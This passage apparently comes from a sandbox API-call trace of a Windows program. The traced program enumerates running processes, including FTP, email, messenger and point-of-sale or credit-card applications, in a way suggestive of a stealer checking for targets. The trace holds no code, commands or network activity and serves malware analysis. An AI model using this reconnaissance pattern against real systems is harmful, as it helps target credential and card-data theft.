cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="barca.exe")) returned 1 [0254.004] Process32Next (in: hSnapshot=0x1d14, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xeb0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="bitkinex.exe")) returned 1 [0254.006] Process32Next (in: hSnapshot=0x1d14, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xeb8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="coreftp.exe")) returned 1 [0254.007] Process32Next (in: hSnapshot=0x1d14, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xec4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="far.exe")) returned 1 [0254.009] Process32Next (in: hSnapshot=0x1d14, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xecc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="filezilla.exe")) returned 1 [0254.011] Process32Next (in: hSnapshot=0x1d14, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xed4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="flashfxp.exe")) returned 1 [0254.015] Process32Next (in: hSnapshot=0x1d14, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xedc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="fling.exe")) returned 1 [0254.017] Process32Next (in: hSnapshot=0x1d14, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf04, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="foxmailincmail.exe")) returned 1 [0254.019] Process32Next (in: hSnapshot=0x1d14, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf0c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="gmailnotifierpro.exe")) returned 1 [0254.020] Process32Next (in: hSnapshot=0x1d14, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf14, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="icq.exe")) returned 1 [0254.022] Process32Next (in: hSnapshot=0x1d14, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf1c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="leechftp.exe")) returned 1 [0254.024] Process32Next (in: hSnapshot=0x1d14, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf30, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="ncftp.exe")) returned 1 [0254.060] Process32Next (in: hSnapshot=0x1d14, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf38, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="notepad.exe")) returned 1 [0254.063] Process32Next (in: hSnapshot=0x1d14, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf4c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="operamail.exe")) returned 1 [0254.065] Process32Next (in: hSnapshot=0x1d14, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf54, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="outlook.exe")) returned 1 [0254.068] Process32Next (in: hSnapshot=0x1d14, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf60, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="pidgin.exe")) returned 1 [0254.070] Process32Next (in: hSnapshot=0x1d14, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf68, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="scriptftp.exe")) returned 1 [0254.072] Process32Next (in: hSnapshot=0x1d14, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf84, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="skype.exe")) returned 1 [0254.078] Process32Next (in: hSnapshot=0x1d14, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf8c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="smartftp.exe")) returned 1 [0254.080] Process32Next (in: hSnapshot=0x1d14, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf98, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="thunderbird.exe")) returned 1 [0254.082] Process32Next (in: hSnapshot=0x1d14, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xfa0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="trillian.exe")) returned 1 [0254.085] Process32Next (in: hSnapshot=0x1d14, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xfb0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="webdrive.exe")) returned 1 [0254.087] Process32Next (in: hSnapshot=0x1d14, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xfb8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="whatsapp.exe")) returned 1 [0254.092] Process32Next (in: hSnapshot=0x1d14, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xfd0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="winscp.exe")) returned 1 [0254.094] Process32Next (in: hSnapshot=0x1d14, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xfe0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="yahoomessenger.exe")) returned 1 [0254.097] Process32Next (in: hSnapshot=0x1d14, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xff4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="active-charge.exe")) returned 1 [0254.099] Process32Next (in: hSnapshot=0x1d14, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x878, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="accupos.exe")) returned 1 [0254.101] Process32Next (in: hSnapshot=0x1d14, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x858, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="afr38.exe")) returned 1 [0254.102] Process32Next (in: hSnapshot=0x1d14, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x7e0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="aldelo.exe")) returned 1 [0254.151] Process32Next (in: hSnapshot=0x1d14, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xe54, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="ccv_server.exe")) returned 1 [0254.159] Process32Next (in: hSnapshot=0x1d14, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x660, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="centralcreditcard.exe")) returned 1 [0254.162] Process32Next (in: hSnapshot=0x1d14, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xb2c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="creditservice.exe")) returned 1 [0254.165] Process32Next (in: hSnapshot=0x1d14, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x72c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="edcsvr.exe")) returned 1 [0254.170] Process32Next (in: hSnapshot=0x1d14, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1004, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="fpos.exe")) returned 1 [0254.172] Process32Next (in: hSnapshot=0x1d14, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1014, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="isspos.exe")) returned 1 [0254.173] Process32Next (in: hSnapshot=0x1d14, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x101c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="mxslipstream.exe")) returned 1 [0254.175] Process32Next (in: hSnapshot=0x1d14, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x102c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="omnipos.exe")) returned 1 [0254.176] Process32Next (in: hSnapshot=0x1d14, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x103c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="spcwin.exe")) returned 1 [0254.178] Process32Next (in: hSnapshot=0x1d14, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1048, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="spgagentservice.exe")) returned 1 [0254.180] Process32Next (in: hSnapshot=0x1d14, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1054, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="utg2.exe")) returned 1 [0254.181] Process32Next (in: hSnapshot=0x1d14, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x108c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="discussion.exe")) returned 1 [0254.183] Process32Next (in: hSnapshot=0x1d14, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1094, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="styledesignbusiness.exe")) returned 1 [0254.187] Process32Next (in: hSnapshot=0x1d14, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x109c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="new_door.exe")) returned 1 [0254.189] Process32Next (in: hSnapshot=0x1d14, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x10b0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="bed fight.exe")) returned 1 [0254.190] Process32Next (in: hSnapshot=0x1d14, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x10b8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="federal hotel.exe")) returned 1 [0254.192] Process32Next (in: hSnapshot=0x1d14, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x10e0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x274, pcPriClassBase=8, dwFlags=0x0, szExeFile="WmiPrvSE.exe")) returned 1 [0254.193] Process32Next (in: hSnapshot=0x1d14, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x12e4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x390, pcPriClassBase=8, dwFlags=0x0, szExeFile="audiodg.exe")) returned 1 [0254.195] Process32Next (in: hSnapshot=0x1d14, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xc9c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x274, pcPriClassBase=8, dwFlags=0x0, szExeFile="backgroundTaskHost.exe")) returned 1 [0254.197] Process32Next (in: hSnapshot=0x1d14, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xc9c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x274, pcPriClassBase=8, dwFlags=0x0, szExeFile="backgroundTaskHost.exe")) returned 0 [0254.216] CloseHandle (hObject=0x1d14) returned 1 [0254.216] Sleep (dwMilliseconds=0x64) [0254.325] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x1018 [0254.335] Process32First (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0254.337] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x73, th32ParentProcessID=0x0, pcPriClassBase=8, dwFlags=0x0, szExeFile="System")) returned 1 [0254.338] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x138, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x4, pcPriClassBase=11, dwFlags=0x0, szExeFile="smss.exe")) returned 1 [0254.342] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x184, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x17c, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0254.344] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1c0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x17c, pcPriClassBase=13, dwFlags=0x0, szExeFile="wininit.exe")) returned 1 [0254.345] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1c8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xd, th32ParentProcessID=0x1b8, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0254.347] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1fc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x1b8, pcPriClassBase=13, dwFlags=0x0, szExeFile="winlogon.exe")) returned 1 [0254.348] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x214, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x10, th32ParentProcessID=0x1c0, pcPriClassBase=9, dwFlags=0x0, szExeFile="services.exe")) returned 1 [0254.350] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x21c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x1c0, pcPriClassBase=9, dwFlags=0x0, szExeFile="lsass.exe")) returned 1 [0254.351] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x274, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1b, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0254.353] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x294, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0254.354] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x30c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x1fc, pcPriClassBase=13, dwFlags=0x0, szExeFile="dwm.exe")) returned 1 [0254.359] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x360, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x45, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0254.361] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x378, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1b, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0254.362] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x390, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x14, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0254.364] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x3a0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xc, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0254.365] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x3f4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1b, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0254.367] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x210, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x11, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0254.368] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x460, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x19, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0254.450] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x4e0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xd, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="spoolsv.exe")) returned 1 [0254.452] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x54c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xd, th32ParentProcessID=0x360, pcPriClassBase=8, dwFlags=0x0, szExeFile="sihost.exe")) returned 1 [0254.454] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x604, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x274, pcPriClassBase=8, dwFlags=0x0, szExeFile="RuntimeBroker.exe")) returned 1 [0254.455] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x64c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0254.457] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x7b4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2f, th32ParentProcessID=0x798, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0254.458] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x7ec, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x360, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskhostw.exe")) returned 1 [0254.460] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x894, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1d, th32ParentProcessID=0x274, pcPriClassBase=8, dwFlags=0x0, szExeFile="ShellExperienceHost.exe")) returned 1 [0254.461] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x908, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1f, th32ParentProcessID=0x274, pcPriClassBase=8, dwFlags=0x0, szExeFile="SearchUI.exe")) returned 1 [0254.463] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xbd0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x360, pcPriClassBase=8, dwFlags=0x0, szExeFile="WMIADAP.exe")) returned 1 [0254.471] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xba8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0254.473] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xad4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="sppsvc.exe")) returned 1 [0254.475] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x670, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="iexplore.exe")) returned 1 [0254.477] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x9d8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x274, pcPriClassBase=8, dwFlags=0x0, szExeFile="WmiPrvSE.exe")) returned 1 [0254.482] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x128, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x11, th32ParentProcessID=0x670, pcPriClassBase=8, dwFlags=0x0, szExeFile="iexplore.exe")) returned 1 [0254.485] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x428, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="degree_sing_pretty.exe")) returned 1 [0254.487] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x840, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="work-heavy.exe")) returned 1 [0254.489] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: 